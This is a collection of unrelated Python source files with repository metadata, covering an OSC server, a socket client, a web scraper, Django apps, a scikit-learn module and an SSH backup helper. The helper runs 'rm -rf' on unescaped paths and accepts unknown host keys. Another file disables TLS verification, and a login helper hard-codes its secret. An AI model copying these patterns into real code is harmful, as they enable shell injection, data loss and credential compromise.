edwardsharp/python
|
291839fc3fe8e431c381454508a02b527dfdda1e
|
6340fdb68e5774f099a587d61c3970fa6b9cc412
|
refs/heads/master
| 2020-05-27T09:32:17.895850 | 2018-01-18T08:30:13 | 2018-01-18T08:30:13 | 4,568,105 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 785 |
py
|
#!/usr/bin/env python
from liblo import *
import sys

class MyServer(ServerThread):
    def __init__(self):
        ServerThread.__init__(self, 8000)

    @make_method('/1/multipush1/1/1', None)
    # my_callback(path, args[, types[, src[, user_data]]])
    def l1_callback(self, path, args):
        # i, f, s = args
        # print "parsed label1 message '%s' with arguments: %d, %f, %s" % (path, i, f, s)
        print "received message '%s' with arguments" % path
        print self
        print args

    @make_method(None, None)
    def fallback(self, path, args):
        print "caught unknown message '%s'" % path
        print args

try:
    server = MyServer()
except ServerError, err:
    print str(err)
    sys.exit()

server.start()
raw_input("press enter to quit...\n")
|
[
"[email protected]"
] | |
baaa8e9d8ca5f90a4057aebc3b06ae714f72c8ef
|
f41b88669ebe05d58dfe93b69b42a2bddc0c01a1
|
/socket/tcp/sample.client.py
|
bb2966a918557ed214cf923371a675bdde3d33d7
|
[] |
no_license
|
byfuls/python
|
69545b4623cb597086cc23b52f9648bb39765f76
|
a95bb96a5e09ebf5e3250e67c58a41e1d5a336b6
|
refs/heads/master
| 2023-04-21T03:43:09.080049 | 2021-05-14T05:00:05 | 2021-05-14T05:00:05 | 272,568,316 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 545 |
py
|
import socket
# Connection settings
SERVER_IP = '127.0.0.1'
SERVER_PORT = 50000
SIZE = 1024
SERVER_ADDR = (SERVER_IP, SERVER_PORT)

# Client socket setup
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
    client_socket.connect(SERVER_ADDR)  # connect to the server
    client_socket.send('hi'.encode())  # send a message to the server
    msg = client_socket.recv(SIZE)  # message received back from the server
    print("resp from server : {}".format(msg))  # print the message received from the server
|
[
"[email protected]"
] | |
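The sample client above expects a listener on 127.0.0.1:50000; a minimal counterpart for local testing (an illustrative assumption, not part of the original repo):

import socket

SERVER_ADDR = ("127.0.0.1", 50000)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind(SERVER_ADDR)
    server_socket.listen()
    conn, addr = server_socket.accept()  # blocks until the sample client connects
    with conn:
        data = conn.recv(1024)           # receives b'hi'
        conn.send(b"echo: " + data)      # reply that the client prints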
6f361c7d8b2af01f6ee96c8df06630eaf5cef7f8
|
1929a989d1e2a5c5caabad32aa8baf4444250574
|
/h2o-py/tests/testdir_munging/pyunit_upload_large.py
|
3d4d69107d8603c202a6d6e94a6ae18df88df391
|
[
"Apache-2.0"
] |
permissive
|
codelibs/h2o-3
|
9c417c0c6ee4ae9a6eaffe5a0373c0d78c37527e
|
cf96fb28da4732870a0d65c24f0d99f422d140d1
|
refs/heads/master
| 2023-05-27T10:04:14.408620 | 2023-04-28T18:16:48 | 2023-04-28T18:16:48 | 253,197,280 | 0 | 0 |
Apache-2.0
| 2020-04-05T09:22:41 | 2020-04-05T09:22:40 | null |
UTF-8
|
Python
| false | false | 772 |
py
|
from __future__ import print_function
import sys
sys.path.insert(1, "../../")
import h2o
import os
import tempfile
from tests import pyunit_utils

def generate_large_file(path, size):
    with open(path, "wb") as f:
        f.seek(size - 1)
        f.write(b"\0")
    assert size == os.stat(path).st_size

def upload_large_file():
    path = os.path.join(tempfile.mkdtemp(), "large.bin")
    byte_size = 2 * 1024 * 1024 * 1024 + 1  # 2GB + 1 byte
    generate_large_file(path, byte_size)
    raw_data = h2o.api("POST /3/PostFile", filename=path)
    print(raw_data)
    assert raw_data["total_bytes"] == byte_size
    h2o.remove(raw_data["destination_frame"])

if __name__ == "__main__":
    pyunit_utils.standalone_test(upload_large_file)
else:
    upload_large_file()
|
[
"[email protected]"
] | |
de725320a63af209519b9a5e0ee804c2715c38e2
|
d0efb8180b17f12f032716663e9202ed664af34b
|
/Pintrest-Board-Download-Python3.py
|
98a16854171b702a64701d8dfbf435b64b7c9df0
|
[] |
no_license
|
smjrifle/Pintrest-Board-Image-Downloader
|
d32dd7a645388aa8df46d59fe296693dc536ebca
|
9b15ee0e680a87c4e32c31f19d22f69e2f9099c2
|
refs/heads/master
| 2021-05-13T18:00:43.502937 | 2018-01-23T18:37:54 | 2018-01-23T18:37:54 | 116,846,587 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,267 |
py
|
URL_String = input("Please enter your Pinterest board url {https://www.pinterest.com/username/board-slug}: ")
from tkinter import filedialog
FOLDER_URL = filedialog.askdirectory(title="Select the folder where you want to save the images: ")
if FOLDER_URL == '':
    print('Folder not selected')
    exit(0)
from lxml import html
import requests
import bs4
import urllib.request  # 'import urllib' alone does not expose urllib.request
page = requests.get(URL_String)
print(page.status_code)
tree = html.fromstring(page.content)
print(tree)
pins = tree.xpath('//div[@class="GrowthUnauthPinImage"]//@href')
print("Pin from board " + URL_String + " will be saved on " + FOLDER_URL)
print("Array of pins in board")
print(pins)
print("Total number of pins " + str(len(pins)))
n = 1
for pin in pins:
    print("Saving Image Number: " + str(n))
    page = requests.get('http://www.pinterest.com' + pin)
    print("Pin " + pin + " processed")
    page_soup = bs4.BeautifulSoup(page.text, "lxml")
    page_element = page_soup.select('img[src]')
    image_address = page_element[0].attrs['src']
    image_title = page_element[0].attrs['alt']
    if len(image_title) < 2:
        image_title = str(n)
    resource = urllib.request.urlopen(image_address)
    with open(FOLDER_URL + "/" + "Pin" + image_title[:50] + ".jpg", "wb") as output:
        output.write(resource.read())
    n = n + 1
|
[
"[email protected]"
] | |
70705d415f9f7e79293d2c40ed2115e5e1caff7c
|
149f3e5d26d9e6428a7d136e9753cae9d87afdb3
|
/mfscrm/crm/urls.py
|
8c71bd74590ba6aef890e41086bc945950a4e961
|
[] |
no_license
|
bpeightal/MavFoodService
|
d628417b4ab2745008665dfc904c79c516c92b1d
|
df49b9147639e41194791ae8e4b2ae46e0610d01
|
refs/heads/master
| 2020-06-21T23:24:27.059553 | 2019-07-18T14:43:28 | 2019-07-18T14:43:28 | 197,577,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,113 |
py
|
from django.conf.urls import url
from . import views
from django.urls import path, re_path
app_name = 'crm'
urlpatterns = [
path('', views.home, name='home'),
re_path(r'^home/$', views.home, name='home'),
path('customer/<int:pk>/summary/', views.summary, name='summary'),
path('service/<int:pk>/edit/', views.service_edit, name='service_edit'),
path('service/create/', views.service_new, name='service_new'),
path('service_list', views.service_list, name='service_list'),
path('service/<int:pk>/delete/', views.service_delete, name='service_delete'),
path('customer_list', views.customer_list, name='customer_list'),
path('customer/<int:pk>/edit/', views.customer_edit, name='customer_edit'),
path('customer/<int:pk>/delete/', views.customer_delete, name='customer_delete'),
path('product/<int:pk>/edit/', views.product_edit, name='product_edit'),
path('product/create/', views.product_new, name='product_new'),
path('product_list', views.product_list, name='product_list'),
path('product/<int:pk>/delete/', views.product_delete, name='product_delete'),
]
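# With app_name = 'crm', these routes are reversed through the namespace,
# e.g. (illustrative): reverse('crm:summary', args=[42]) -> '/customer/42/summary/'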
|
[
"[email protected]"
] | |
2988550f0019d72b5c3f9fc7a35abca539069ed6
|
e54c41eafc5132aba7dcfb62dae1a456e6065ad7
|
/parse_station.py
|
5192b302992adbcd09aa04068a84ec68a5dc1aee
|
[] |
no_license
|
YJGit/12306-tools
|
69c3a3916fe5e7963955932d68a8958e4cb3be67
|
c5cfd3bba17806b0842b6fce088ccda1b68acb89
|
refs/heads/master
| 2021-05-12T06:03:25.961160 | 2018-01-12T08:27:09 | 2018-01-12T08:27:09 | 117,208,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 471 |
py
|
import re
import requests
from pprint import pprint
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9028'
response = requests.get(url, verify=False)
stations = re.findall(u'([\u4e00-\u9fa5]+)\|([A-Z]+)', response.text)
with open("stations.py", "w", encoding="utf-8") as fout:
pprint(dict(stations), fout, indent=4)
print("get stations ok!")
|
[
"[email protected]"
] | |
ba3339eeda813a3c7d315fcb1cb1c530a8080125
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/lib/python3.6/site-packages/sklearn/preprocessing/_discretization.py
|
7b26ce916e1893d6d13fc02304699fa07bd412b3
|
[
"Apache-2.0"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 |
Apache-2.0
| 2022-12-09T21:01:00 | 2019-04-18T03:57:00 |
CSS
|
UTF-8
|
Python
| false | false | 12,083 |
py
|
# -*- coding: utf-8 -*-
# Author: Henry Lin <[email protected]>
# Tom Dupré la Tour
# License: BSD
from __future__ import division, absolute_import
import numbers
import numpy as np
import warnings
from . import OneHotEncoder
from ..base import BaseEstimator, TransformerMixin
from ..utils.validation import check_array
from ..utils.validation import check_is_fitted
from ..utils.validation import FLOAT_DTYPES
from ..utils.fixes import np_version
class KBinsDiscretizer(BaseEstimator, TransformerMixin):
"""Bin continuous data into intervals.
Read more in the :ref:`User Guide <preprocessing_discretization>`.
Parameters
----------
n_bins : int or array-like, shape (n_features,) (default=5)
The number of bins to produce. Raises ValueError if ``n_bins < 2``.
encode : {'onehot', 'onehot-dense', 'ordinal'}, (default='onehot')
Method used to encode the transformed result.
onehot
Encode the transformed result with one-hot encoding
and return a sparse matrix. Ignored features are always
stacked to the right.
onehot-dense
Encode the transformed result with one-hot encoding
and return a dense array. Ignored features are always
stacked to the right.
ordinal
Return the bin identifier encoded as an integer value.
strategy : {'uniform', 'quantile', 'kmeans'}, (default='quantile')
Strategy used to define the widths of the bins.
uniform
All bins in each feature have identical widths.
quantile
All bins in each feature have the same number of points.
kmeans
Values in each bin have the same nearest center of a 1D k-means
cluster.
Attributes
----------
n_bins_ : int array, shape (n_features,)
Number of bins per feature. Bins whose width are too small
(i.e., <= 1e-8) are removed with a warning.
bin_edges_ : array of arrays, shape (n_features, )
The edges of each bin. Contain arrays of varying shapes ``(n_bins_, )``
Ignored features will have empty arrays.
Examples
--------
>>> X = [[-2, 1, -4, -1],
... [-1, 2, -3, -0.5],
... [ 0, 3, -2, 0.5],
... [ 1, 4, -1, 2]]
>>> est = KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')
>>> est.fit(X) # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
KBinsDiscretizer(...)
>>> Xt = est.transform(X)
>>> Xt # doctest: +SKIP
array([[ 0., 0., 0., 0.],
[ 1., 1., 1., 0.],
[ 2., 2., 2., 1.],
[ 2., 2., 2., 2.]])
Sometimes it may be useful to convert the data back into the original
feature space. The ``inverse_transform`` function converts the binned
data into the original feature space. Each value will be equal to the mean
of the two bin edges.
>>> est.bin_edges_[0]
array([-2., -1., 0., 1.])
>>> est.inverse_transform(Xt)
array([[-1.5, 1.5, -3.5, -0.5],
[-0.5, 2.5, -2.5, -0.5],
[ 0.5, 3.5, -1.5, 0.5],
[ 0.5, 3.5, -1.5, 1.5]])
Notes
-----
In bin edges for feature ``i``, the first and last values are used only for
``inverse_transform``. During transform, bin edges are extended to::
np.concatenate([-np.inf, bin_edges_[i][1:-1], np.inf])
You can combine ``KBinsDiscretizer`` with
:class:`sklearn.compose.ColumnTransformer` if you only want to preprocess
part of the features.
``KBinsDiscretizer`` might produce constant features (e.g., when
``encode = 'onehot'`` and certain bins do not contain any data).
These features can be removed with feature selection algorithms
(e.g., :class:`sklearn.feature_selection.VarianceThreshold`).
See also
--------
sklearn.preprocessing.Binarizer : class used to bin values as ``0`` or
``1`` based on a parameter ``threshold``.
"""
def __init__(self, n_bins=5, encode='onehot', strategy='quantile'):
self.n_bins = n_bins
self.encode = encode
self.strategy = strategy
def fit(self, X, y=None):
"""Fits the estimator.
Parameters
----------
X : numeric array-like, shape (n_samples, n_features)
Data to be discretized.
y : ignored
Returns
-------
self
"""
X = check_array(X, dtype='numeric')
valid_encode = ('onehot', 'onehot-dense', 'ordinal')
if self.encode not in valid_encode:
raise ValueError("Valid options for 'encode' are {}. "
"Got encode={!r} instead."
.format(valid_encode, self.encode))
valid_strategy = ('uniform', 'quantile', 'kmeans')
if self.strategy not in valid_strategy:
raise ValueError("Valid options for 'strategy' are {}. "
"Got strategy={!r} instead."
.format(valid_strategy, self.strategy))
n_features = X.shape[1]
n_bins = self._validate_n_bins(n_features)
bin_edges = np.zeros(n_features, dtype=object)
for jj in range(n_features):
column = X[:, jj]
col_min, col_max = column.min(), column.max()
if col_min == col_max:
warnings.warn("Feature %d is constant and will be "
"replaced with 0." % jj)
n_bins[jj] = 1
bin_edges[jj] = np.array([-np.inf, np.inf])
continue
if self.strategy == 'uniform':
bin_edges[jj] = np.linspace(col_min, col_max, n_bins[jj] + 1)
elif self.strategy == 'quantile':
quantiles = np.linspace(0, 100, n_bins[jj] + 1)
if np_version < (1, 9):
quantiles = list(quantiles)
bin_edges[jj] = np.asarray(np.percentile(column, quantiles))
elif self.strategy == 'kmeans':
from ..cluster import KMeans # fixes import loops
# Deterministic initialization with uniform spacing
uniform_edges = np.linspace(col_min, col_max, n_bins[jj] + 1)
init = (uniform_edges[1:] + uniform_edges[:-1])[:, None] * 0.5
# 1D k-means procedure
km = KMeans(n_clusters=n_bins[jj], init=init, n_init=1)
centers = km.fit(column[:, None]).cluster_centers_[:, 0]
# Must sort, centers may be unsorted even with sorted init
centers.sort()
bin_edges[jj] = (centers[1:] + centers[:-1]) * 0.5
bin_edges[jj] = np.r_[col_min, bin_edges[jj], col_max]
# Remove bins whose width are too small (i.e., <= 1e-8)
if self.strategy in ('quantile', 'kmeans'):
mask = np.ediff1d(bin_edges[jj], to_begin=np.inf) > 1e-8
bin_edges[jj] = bin_edges[jj][mask]
if len(bin_edges[jj]) - 1 != n_bins[jj]:
warnings.warn('Bins whose width are too small (i.e., <= '
'1e-8) in feature %d are removed. Consider '
'decreasing the number of bins.' % jj)
n_bins[jj] = len(bin_edges[jj]) - 1
self.bin_edges_ = bin_edges
self.n_bins_ = n_bins
if 'onehot' in self.encode:
self._encoder = OneHotEncoder(
categories=[np.arange(i) for i in self.n_bins_],
sparse=self.encode == 'onehot')
# Fit the OneHotEncoder with toy datasets
# so that it's ready for use after the KBinsDiscretizer is fitted
self._encoder.fit(np.zeros((1, len(self.n_bins_)), dtype=int))
return self
def _validate_n_bins(self, n_features):
"""Returns n_bins_, the number of bins per feature.
"""
orig_bins = self.n_bins
if isinstance(orig_bins, numbers.Number):
if not isinstance(orig_bins, (numbers.Integral, np.integer)):
raise ValueError("{} received an invalid n_bins type. "
"Received {}, expected int."
.format(KBinsDiscretizer.__name__,
type(orig_bins).__name__))
if orig_bins < 2:
raise ValueError("{} received an invalid number "
"of bins. Received {}, expected at least 2."
.format(KBinsDiscretizer.__name__, orig_bins))
return np.full(n_features, orig_bins, dtype=np.int)
n_bins = check_array(orig_bins, dtype=np.int, copy=True,
ensure_2d=False)
if n_bins.ndim > 1 or n_bins.shape[0] != n_features:
raise ValueError("n_bins must be a scalar or array "
"of shape (n_features,).")
bad_nbins_value = (n_bins < 2) | (n_bins != orig_bins)
violating_indices = np.where(bad_nbins_value)[0]
if violating_indices.shape[0] > 0:
indices = ", ".join(str(i) for i in violating_indices)
raise ValueError("{} received an invalid number "
"of bins at indices {}. Number of bins "
"must be at least 2, and must be an int."
.format(KBinsDiscretizer.__name__, indices))
return n_bins
def transform(self, X):
"""Discretizes the data.
Parameters
----------
X : numeric array-like, shape (n_samples, n_features)
Data to be discretized.
Returns
-------
Xt : numeric array-like or sparse matrix
Data in the binned space.
"""
check_is_fitted(self, ["bin_edges_"])
Xt = check_array(X, copy=True, dtype=FLOAT_DTYPES)
n_features = self.n_bins_.shape[0]
if Xt.shape[1] != n_features:
raise ValueError("Incorrect number of features. Expecting {}, "
"received {}.".format(n_features, Xt.shape[1]))
bin_edges = self.bin_edges_
for jj in range(Xt.shape[1]):
# Values which are close to a bin edge are susceptible to numeric
# instability. Add eps to X so these values are binned correctly
# with respect to their decimal truncation. See documentation of
# numpy.isclose for an explanation of ``rtol`` and ``atol``.
rtol = 1.e-5
atol = 1.e-8
eps = atol + rtol * np.abs(Xt[:, jj])
Xt[:, jj] = np.digitize(Xt[:, jj] + eps, bin_edges[jj][1:])
np.clip(Xt, 0, self.n_bins_ - 1, out=Xt)
if self.encode == 'ordinal':
return Xt
return self._encoder.transform(Xt)
def inverse_transform(self, Xt):
"""Transforms discretized data back to original feature space.
Note that this function does not regenerate the original data
due to discretization rounding.
Parameters
----------
Xt : numeric array-like, shape (n_sample, n_features)
Transformed data in the binned space.
Returns
-------
Xinv : numeric array-like
Data in the original feature space.
"""
check_is_fitted(self, ["bin_edges_"])
if 'onehot' in self.encode:
Xt = self._encoder.inverse_transform(Xt)
Xinv = check_array(Xt, copy=True, dtype=FLOAT_DTYPES)
n_features = self.n_bins_.shape[0]
if Xinv.shape[1] != n_features:
raise ValueError("Incorrect number of features. Expecting {}, "
"received {}.".format(n_features, Xinv.shape[1]))
for jj in range(n_features):
bin_edges = self.bin_edges_[jj]
bin_centers = (bin_edges[1:] + bin_edges[:-1]) * 0.5
Xinv[:, jj] = bin_centers[np.int_(Xinv[:, jj])]
return Xinv
|
[
"[email protected]"
] | |
fcf372ccfafa7ce16d3ec5744829c5fc40edd1be
|
3c33d89e127d3f04b4232f22361919ce1f95e2e6
|
/ngremote.py
|
ce6aa4445bed5349f64efb80a0947b5f41443f5b
|
[] |
no_license
|
kaevee/NgBackup
|
1277a4e6802a5b3b65481fa7017b51da03d035b6
|
2f3ec00f2374b5f4dd196425c57abff596954582
|
refs/heads/main
| 2023-08-24T00:52:10.107383 | 2021-09-28T03:13:16 | 2021-09-28T03:13:16 | 409,851,971 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,766 |
py
|
from pathlib import Path
import paramiko
from paramiko import transport
from paramiko.client import AutoAddPolicy, SSHClient
from paramiko.rsakey import RSAKey
from paramiko.ssh_exception import AuthenticationException, BadHostKeyException, SSHException
import logging
class NgRemote:
host: str
user: str
port: int
private_key: RSAKey
__ssh_client: SSHClient
logger: logging.Logger
def __init__(self, host: str, port: int, user: str, ssh_key_path: Path) -> None:
self.private_key = paramiko.RSAKey.from_private_key_file(ssh_key_path.as_posix())
self.host = host
self.user = user
self.port = port
self.__ssh_client = SSHClient()
self.__ssh_client.set_missing_host_key_policy(AutoAddPolicy())
self.logger = logging.getLogger(f"NgBackup.NgRemote.{self.user}_{self.host}")
def connect(self):
try:
self.__ssh_client.connect(hostname=self.host, port=self.port, username=self.user, pkey=self.private_key)
self.logger.log(logging.INFO, "Connected successfully")
except AuthenticationException as ae:
self.logger.log(logging.ERROR, "Connect: %s", ae)
except BadHostKeyException as bh:
self.logger.log(logging.ERROR, "Connect: %s", bh)
except SSHException as se:
self.logger.log(logging.ERROR, "Connect: %s", se)
except Exception as ex:
self.logger.log(logging.ERROR, "Connect: %s", ex)
def close(self):
try:
self.__ssh_client.close()
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raied when remote connection is closed")
def check_status(self):
transport = self.__ssh_client.get_transport()
if transport and transport.is_active():
return True
else:
return False
@property
def is_alive(self) -> bool:
return self.check_status()
def exists(self, path: Path) -> bool:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.stat(path.as_posix())
return True
except FileNotFoundError as ex:
return False
except Exception as ex:
self.logger.log(logging.ERROR, "Failed to list the path %s", path.as_posix())
return False
def listdir(self, path: Path) -> list[Path]:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
entries = sorted(sftp.listdir(path.as_posix()))
increments: list[Path] = []
            for entry in entries:
                p = path / entry
                increments.append(p)
return increments
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raised while listing files at %s", path.as_posix())
return None
def makedirs(self, path: Path) -> bool:
try:
stdin, stdout, stderr = self.__ssh_client.exec_command(f"mkdir -p {path.as_posix()}")
return True
except Exception as Ex:
self.logger.log(logging.ERROR, "Exception raised while creating directory %s", path.as_posix())
return False
def makedirs_old(self, path: Path) -> bool:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.mkdir(path.as_posix())
return True
except:
self.logger.log(logging.ERROR, "Exception raised when creating directory %s", path.as_posix())
return False
def rename(self, src_path: Path, dest_path: Path):
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.rename(src_path.as_posix(), dest_path.as_posix())
return True
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raised while renaming %s to %s", src_path.as_posix(), dest_path.as_posix())
return False
def rmtree(self, path: Path) -> bool:
cmd = f"rm -rf {path.as_posix()}"
try:
stdin, stdout, stderr = self.__ssh_client.exec_command(cmd)
            err_output = stderr.read().decode('utf8')  # read once: the stream is consumed on first read
            if err_output == '':
                return True
            else:
                self.logger.log(logging.ERROR, err_output)
                return False
except Exception as ex:
self.logger.log(logging.ERROR, "Failed to delete path %s", path.as_posix())
return False
|
[
"[email protected]"
] | |
c9538de673b65c0b29c54571c0b7394ae9b9485a
|
b772c1bfdf94886d06505a29053d8ff419f5b99f
|
/estudiantes/migrations/0001_initial.py
|
c379140b99b3a9a307d628b6c27a7c08cd091790
|
[] |
no_license
|
dehivix/bot_algoritmos
|
54dfda89e1216559646eb92a6d176c06af40cec3
|
e9be630b4f771aab4ac3fa262888a1b677063849
|
refs/heads/master
| 2022-02-10T05:18:38.506667 | 2016-05-08T20:20:31 | 2016-05-08T20:20:31 | 43,855,581 | 1 | 0 | null | 2022-01-21T19:00:33 | 2015-10-08T01:43:12 |
Python
|
UTF-8
|
Python
| false | false | 1,687 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 22:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Estudiantes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cedula', models.CharField(max_length=50, unique=True, verbose_name='N\xfamero de Identificaci\xf3n')),
('apellido', models.CharField(max_length=100)),
('nombre', models.CharField(max_length=100)),
],
options={
'db_table': 'estudiantes',
'verbose_name_plural': 'estudiantes',
},
),
migrations.CreateModel(
name='Seccion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=100)),
('asignatura', models.CharField(max_length=100)),
('codigo', models.CharField(blank=True, max_length=10, null=True)),
],
options={
'db_table': 'secciones',
'verbose_name_plural': 'secciones',
},
),
migrations.AddField(
model_name='estudiantes',
name='seccion',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='estudiantes.Seccion'),
),
]
|
[
"[email protected]"
] | |
d891dab2b005529ae77978248f4f5b948a30095b
|
87062d04d0de4effcd76ff88b80906da582a0be9
|
/project3/app/login_helper.py
|
95d5af2e8b263e05674fc3a85fb6c7211212251c
|
[] |
no_license
|
ohheydom/udacity_projects
|
16fedb4cc490a6884109a568c7d3620a71167af5
|
b795891f558e782b4092a49602039c5f209024ac
|
refs/heads/master
| 2021-01-10T23:04:06.959236 | 2016-10-31T14:30:42 | 2016-10-31T14:30:42 | 70,427,820 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 810 |
py
|
import hmac
import string
import random
import hashlib
SECRET = '?e@7[!{+w$)W<s4Z)ENTzfWZ-K#fK.LR'
# Hashing helper methods
def build_salt(length=5):
return ''.join(random.choice(string.letters) for _ in xrange(length))
def build_password_hash(username, password, salt=None):
if not salt:
salt = build_salt()
h = hashlib.sha256(username + password + salt).hexdigest()
return '{},{}'.format(salt, h)
def valid_password(username, password, h):
salt = h.split(',')[0]
return h == build_password_hash(username, password, salt)
# Cookie helper methods
def build_secure_val(val):
return '{}|{}'.format(val, hmac.new(SECRET, val).hexdigest())
def check_secure_val(secure_val):
val = secure_val.split('|')[0]
if build_secure_val(val) == secure_val:
return val
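# Example round trip (illustrative values; real output depends on the random salt):
# h = build_password_hash('alice', 'hunter2')   # -> '<salt>,<sha256 hexdigest>'
# valid_password('alice', 'hunter2', h)         # -> True
# cookie = build_secure_val('42')               # -> '42|<hmac hexdigest>'
# check_secure_val(cookie)                      # -> '42' (implicitly None if tampered)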
|
[
"[email protected]"
] | |
ad6f6960cdbbc6c8f57b0490e1f141715f7b7a79
|
d7f8e70d67442463c221c8f011b9e5bfa36b2aaa
|
/student_api/models.py
|
fb33d301fe793ef806bb48e1b95013a73398e5b0
|
[] |
no_license
|
BipinKalra/StudentAPI_Django
|
ea8484912ce4dc486c8c1a75ddc5c9424c4f31bc
|
f54ec45a159a21cc0aa8474b04d72c8b338d63d7
|
refs/heads/master
| 2022-05-03T04:25:13.311212 | 2019-09-09T17:01:52 | 2019-09-09T17:01:52 | 207,360,996 | 0 | 0 | null | 2022-04-22T22:18:57 | 2019-09-09T17:03:37 |
Python
|
UTF-8
|
Python
| false | false | 1,065 |
py
|
from django.db import models
from django.core.validators import (
MaxValueValidator,
MinValueValidator
)
# Create your models here.
class Student(models.Model):
GENDERS = (
("f", "female"),
("m", "male"),
("u", "Undisclosed")
)
name = models.CharField(max_length = 100)
roll_number = models.IntegerField(unique = True)
email = models.EmailField(max_length = 100, null = True)
gender = models.CharField(max_length = 1, choices = GENDERS, null = True)
percentage = models.FloatField()
age = models.IntegerField(
null = True,
validators = [
MaxValueValidator(100),
MinValueValidator(5)
]
)
institute = models.ForeignKey("Institute", on_delete = models.CASCADE, null = True, blank = True)
def __str__(self):
return self.name
class Institute(models.Model):
TYPES = (
("h", "High School"),
("c", "College")
)
name = models.CharField(max_length = 200)
type_of_institute = models.CharField(max_length = 1, choices = TYPES, null = True)
def __str__(self):
return self.name
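# Example ORM usage (illustrative -- the values are made up, not from the project):
# inst = Institute.objects.create(name="Springfield High", type_of_institute="h")
# Student.objects.create(name="Ada", roll_number=1, percentage=92.5, institute=inst)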
|
[
"[email protected]"
] | |
f841a6d78d2ca8e726c6e9843c80a73b250420e9
|
27c53a4ae22c17a2bed24ed0b4d46583b8feff64
|
/numpy_exercise.py
|
97ecab6f660314df8d56eceb899b67638388bfe3
|
[] |
no_license
|
yscho224/numpy
|
5ccc4f5bfdc75a395bc1e2ac67310ba32a68b2ab
|
eb336a5379c1bd578943316ac23949ca00b75009
|
refs/heads/main
| 2022-12-19T18:35:23.107858 | 2020-10-07T06:47:30 | 2020-10-07T06:47:30 | 301,658,830 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 553 |
py
|
'''
use NumPy random-number generation to create an array of
twelve random grades in the range 60 through 100, then
reshape the result into a 3-by-4 array. Calculate the average
of all the grades, the averages of the grades for each test
and the averages of the grades for each student.
'''
import numpy as np
grades = np.random.randint(60, 101, 12).reshape(3,4)
print(grades)
print('All grades', grades.mean())
print("AVG by each test", grades.mean(axis = 0))
print("AVG by each student", grades.mean(axis = 1))
|
[
"[email protected]"
] | |
d0028651862455ad29cc5783753b1f241f679938
|
4d7fd59810aad8bd63bbf8fcc2dbb1158009bdd0
|
/comprehensions-2020-05-18_13-22-57-956.py
|
a8e7d5a62a8a2b3bfbf8b8b8fcda4edc80c1151a
|
[] |
no_license
|
doughbuoy/learning_python
|
0346ffd97c310a9bd4fec69c2d5958fb0fc71dcc
|
36816c2cb024b60366c5df0d4bf6e11d142e7ece
|
refs/heads/master
| 2022-12-04T05:57:44.301124 | 2020-08-28T00:44:41 | 2020-08-28T00:44:41 | 259,989,146 | 0 | 0 | null | 2020-08-28T00:44:43 | 2020-04-29T17:05:10 |
Python
|
UTF-8
|
Python
| false | false | 1,076 |
py
|
words = "On a dark desert highway Cool wind in my hair Warm smell of colitas Rising up through the air".split()
lengths = [len(word) for word in words]
print(words)
print(lengths)
# ALTERNATIVELY
lengths2 = []
for item in words:
lengths2.append(len(item))
print(lengths2)
from math import factorial
# creates a list of the number of digits in x! for x = 0 to 19
f = [len(str(factorial(x))) for x in range(20)]
print(f"F contains:{f}")
print(f" F is of type {type(f)} ")
g = {len(str(factorial(x))) for x in range(20) }
print(f"g contains:{g}")
print(f" G is of type {type(g)} Note DUPES are eliminated")
colors2code = { 'WHITE':'#FFFFFF',
'SILVER':'#C0C0C0',
'GRAY':'#808080',
'BLACK':'#000000',
'RED':'#FF0000',
'MAROON':'#800000',
'YELLOW':'#FFFF00',
'OLIVE':'#808000',
'LIME':'#00FF00',
'GREEN':'#008000',
'AQUA':'#00FFFF',
'TEAL':'#008080',
'BLUE':'#0000FF',
'NAVY':'#000080',
'FUCHSIA':'#FF00FF',
'PURPLE':'#800080',
}
code2color = {code: color for color, code in colors2code.items()}
print(f"code2color contains:{code2color}")
print(f" code2color is of type {type(code2color)} ")
|
[
"[email protected]"
] | |
04b349165621c8e2ed4e9273c7f99f5570861329
|
1019c1afd3b8c4be7d1870499d3803a820a51f76
|
/nbayes/nbayes/urls.py
|
d1f8555cf8d60a30ad50c51ecfd5193e25aafd5e
|
[] |
no_license
|
shunshun0904/django-apps
|
6f628ae02c0c3bb07eedd456f97d59787e7a7144
|
93e5851619a42eb90208ec3c1696aaa9b91f360b
|
